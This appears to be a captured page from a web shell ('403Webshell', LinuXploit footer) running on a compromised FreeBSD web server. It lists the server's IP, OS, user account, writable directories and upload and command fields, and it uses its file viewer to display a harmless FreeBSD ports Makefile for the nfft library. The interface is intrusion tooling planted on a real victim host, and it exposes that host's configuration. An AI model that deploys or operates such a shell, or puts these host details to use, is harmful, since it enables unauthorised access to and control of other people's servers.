403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/nfft/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/nfft/Makefile
PORTNAME=	nfft
DISTVERSION=	3.5.2
PORTREVISION=	2
CATEGORIES=	math
MASTER_SITES=	https://github.com/NFFT/${PORTNAME}/releases/download/${DISTVERSION}/

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Nonequispaced fast Fourier transform
WWW=		https://www-user.tu-chemnitz.de/~potts/nfft

LICENSE=	GPLv2

BUILD_DEPENDS=	bash:shells/bash \
		cunit>0:devel/cunit
LIB_DEPENDS=	libfftw3.so:math/fftw3

USES=		libtool localbase
USE_LDCONFIG=	yes

GNU_CONFIGURE=	yes

INSTALL_TARGET=	install-strip
TEST_TARGET=	check
PORTDOCS=	*

CONFIGURE_SHELL=	${LOCALBASE}/bin/bash
CONFIGURE_ARGS=		--disable-static \
			--disable-doxygen-doc \
			--enable-all \
			--with-fftw3

OPTIONS_DEFINE=			DOCS OPENMP
OPTIONS_DEFAULT_aarch64=	OPENMP
OPTIONS_DEFAULT_amd64=		OPENMP
OPTIONS_SUB=	yes

OPENMP_CONFIGURE_ENABLE=	openmp

.include <bsd.port.options.mk>

# We don't have cexpl implemented in earlier versions
# https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=216862

.if ${OPSYS} == FreeBSD && ${OSVERSION} < 1300521

LIB_DEPENDS+=	libopenlibm.so:math/openlibm
LDFLAGS+=	-lopenlibm

.endif

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit